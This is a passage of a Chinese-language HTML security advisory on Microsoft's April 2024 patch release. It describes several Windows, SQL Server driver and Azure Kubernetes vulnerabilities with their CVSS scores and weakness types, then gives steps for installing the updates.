break-all;"><span style="font-size: 14px;">6.7/5.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-29056</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows认证权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">4.3/3.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-29988</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">SmartScreen提示安全功能绕过漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">8.8/8.2</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-26158：Microsoft安装服务本地权限提升漏洞</span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Microsoft安装服务中的文件访问前链接解析不正确漏洞（CWE-59），经过普通用户身份认证的本地攻击者可以利用此漏洞获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-26209：Microsoft本地安全认证子系统服务(LSASS)信息泄露漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是LSASS服务中的使用未初始化的资源漏洞（CWE-908），经过普通用户身份认证的本地攻击者可以利用此漏洞泄露系统未初始化内存中的信息。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-26211：Windows远程访问连接管理器本地权限提升漏洞</span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Windows远程访问连接管理器中的堆溢出漏洞（CWE-122），经过普通用户身份认证的本地攻击者可以利用此漏洞获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-26212：DHCP Server服务拒绝服务漏洞</span></span><br/></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是DHCP Server服务中的不受控制的资源消耗漏洞（CWE-400），未经身份认证的远程攻击者可以利用此漏洞使目标系统的DHCP Server服务拒绝服务。</span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-26218：Windows Kernel本地权限提升漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Windows Kernel中的TOCTOU条件竞争漏洞（CWE-367）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-26230、CVE-2024-26239：Windows Telephony Server本地权限提升漏洞</span><br/></span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">CVE-2024-26230是Windows Telephony Server中的释放后重用漏洞（CWE-416），CVE-2024-26239是Windows Telephony Server中的堆溢出漏洞（CWE-122）。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-26241：Windows Win32k本地权限提升漏洞</span><br/></span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Windows Win32k中的释放后重用漏洞（CWE-416），经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-26256：libarchive远程代码执行漏洞</span><br/></span></span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Windows libarchive库中的堆溢出漏洞（CWE-122），未经授权的攻击者需要诱导受害者将恶意文件保存到本地，等待用户启动连接后触发该漏洞造成任意代码执行。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-28903、CVE-2024-28921：Secure Boot安全功能绕过漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Windows Secure Boot中的保护机制失效漏洞（CWE-693），拥有高权限的本地攻击者可以利用此漏洞绕过安全启动保护。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-29056：Windows认证权限提升漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Windows认证中的使用有风险的加密算法漏洞（CWE-327），拥有跨组织信任用户的攻击者成功利用此漏洞可能会获得授予组织内所有用户的访问权限。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;">CVE-2024-29988：SmartScreen提示安全功能绕过漏洞</span></p></li></ul><p style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">该漏洞是SmartScreen提示中的保护机制失效漏洞（CWE-693），未经身份认证的远程攻击者通过向受害者发送特制的文件并诱骗受害者运行该特制文件来利用此漏洞，成功利用此漏洞可以绕过&#34;网页标记&#34;（Mark of the Web，MotW）功能，从而在目标系统上执行恶意代码。</span></p><p style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">该漏洞与微软2024年2月补丁日修复的在野利用漏洞CVE-2024-21412相似，微软目前并未将其列为已被利用的漏洞，但有情报显示该漏洞存在在野利用。</span></p><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="width: 577.422px;letter-spacing: 0.578px;white-space: normal;list-style-type: square;"><li style="font-weight: bold;"><section style="margin-bottom: 8px;line-height: 1.6em;text-align: left;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);font-size: 16px;">高评分漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="314" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="70" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-29990</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft Azure Kubernetes服务机密容器特权提升漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.0/8.1</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-26179</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows路由和远程访问服务远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-26200</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows路由和远程访问服务远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-26205</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows路由和远程访问服务远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-28906</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft SQL Server的OLE DB驱动远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-28929</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft SQL Server的ODBC驱动远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-20678</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows远程过程调用运行时远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-29990：Microsoft Azure Kubernetes服务机密容器特权提升漏洞</span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">该漏洞是Microsoft Azure Kubernetes服务机密容器中的访问控制不当漏洞（CWE-284），未经身份认证的远程攻击者可以访问不受信任的AKS Kubernetes节点和AKS机密容器，以接管其可能绑定的网络栈之外的机密来宾和容器来利用此漏洞。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">成功利用此漏洞的攻击者可能会窃取凭据并影响超出Azure Kubernetes服务机密容器(AKSCC)管理的安全范围的资源。该漏洞利用复杂性很高，成功利用此漏洞需要攻击者准备目标环境以提高利用可靠性。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-26179、CVE-2024-26200、CVE-2024-26205：Windows路由和远程访问服务远程代码执行漏洞</span><br/></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">这些漏洞是Windows路由和远程访问服务中的堆溢出漏洞（CWE-122），未经身份认证的远程攻击者通过诱骗受害者连接到他们控制的恶意服务器来利用这些漏洞，成功利用这些漏洞可以使攻击者在受害者的客户端上下文中执行任意代码。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-28906：Microsoft SQL Server的OLE DB驱动远程代码执行漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Microsoft SQL Server的OLE DB驱动中的堆溢出漏洞（CWE-122），未经身份认证的远程攻击者通过诱骗经过身份认证的受害者使用其SQL客户端连接到攻击者控制的恶意SQL数据库来利用此漏洞。建立连接后，服务器可以向客户端发送特制的回复，客户端在解析服务器回复的过程中触发此漏洞，成功利用此漏洞可使攻击者在受害者SQL客户端上下文中执行任意代码。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">本月安全更新中还有很多此组件中与此漏洞类似的漏洞，欲知更多信息，请参考微软应急响应中心网站。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-28929：Microsoft SQL Server的ODBC驱动远程代码执行漏洞</span></span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">该漏洞是Microsoft SQL Server的ODBC驱动中的整数溢出漏洞（CWE-190），未经身份认证的远程攻击者通过诱骗经过身份认证的受害者使用ODBC连接到攻击者控制的恶意SQL服务器来利用此漏洞。建立连接后，服务器可以向客户端发送特制的回复，客户端在解析服务器回复的过程中触发此漏洞，成功利用此漏洞可使攻击者在受害者ODBC客户端上下文中执行任意代码。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">本月安全更新中还有很多此组件中与此漏洞类似的漏洞，欲知更多信息，请参考微软应急响应中心网站。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">CVE-2024-20678：Windows远程过程调用运行时远程代码执行漏洞</span><br/></span></span></section></li></ul><p style=""><span style="font-size: 14px;">该漏洞是Windows远程过程调用运行时中的类型混淆漏洞（CWE-843），经过任何身份认证的远程攻击者通过向RPC服务器发送特制的RPC调用来利用此漏洞，这可能会导致攻击者在服务器端以与RPC服务相同的权限执行远程代码。</span></p><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x02 影响版本</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="text-indent: 0em;white-space: normal;line-height: 25.5px;text-align: left;margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">影响多个主流版本的Windows，多个主流版本的Microsoft系列软件。</span></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x03 修复建议</span></strong><br/></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><p style="white-space: normal;margin-top: 16px;margin-bottom: 16px;"><strong><span style="font-size: 16px;">Windows自动更新</span></strong></p></li></ul><section style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">Windows系统默认启用Microsoft Update，当检测到可用更新时，将会自动下载更新并在下一次启动时安装。还可通过以下步骤快速安装更新：</span></section><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”-&gt;“系统和安全”-&gt;“Windows更新”）。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">3、选择“检查更新”，等待系统将自动检查并下载可用更新。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”-&gt;“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。</span></p><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><strong><span style="font-size: 16px;">手动安装补丁</span></strong><strong><span style="font-size: 14px;"></span></strong><span style="font-size: 14px;"><br/></span></p></li></ul><section style="letter-spacing: 0.578px;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">另外，对于不能自动更新的系统版本，可参考以下链接下载适用于该系统的04月补丁并安装：</span><span style="font-size: 14px;letter-spacing: 0.578px;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 